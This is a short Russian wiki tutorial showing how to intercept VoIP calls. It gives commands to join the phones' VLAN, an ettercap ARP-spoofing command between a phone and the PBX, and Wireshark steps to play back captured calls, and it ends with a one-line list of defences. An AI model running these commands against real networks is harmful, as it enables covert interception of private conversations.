VoIP-sniffing

Материал из Xgu.ru

Перейти к: навигация, поиск
Автор: Сергей Бондаренко

ARP-spoofing для прослушивания VoIP звонков.

Содержание

[править] VLAN-hoping

Переходим в VLAN где находятся телефоны:

sudo ifconfig vlan150 create 
sudo ifconfig vlan150 inet 172.16.150.172 netmask 255.255.255.0 vlan 150 vlandev en0

[править] ARP-sppofing

Делаем ARP-spoofing телефона (172.16.150.11) и IP PBX (172.16.150.1) :

sudo ettercap -i vlan150 -T -M arp -L etterlog /172.16.150.11/ /172.16.150.1/

[править] Wireshark

1. Start a new live capture -> select en0 -> sniff -> stop sniff

2. Telephony -> VoIP Calls -> select a call -> press Player

Wireshark-voipcalls.png
Wireshark-voipcalls1.png
Wireshark-voipcalls2.png


[править] Методы предотвращения

Использовать 802.1x, SIP TLS и SRTP.


Источник — «http://xgu.ru:81/wiki/VoIP-sniffing»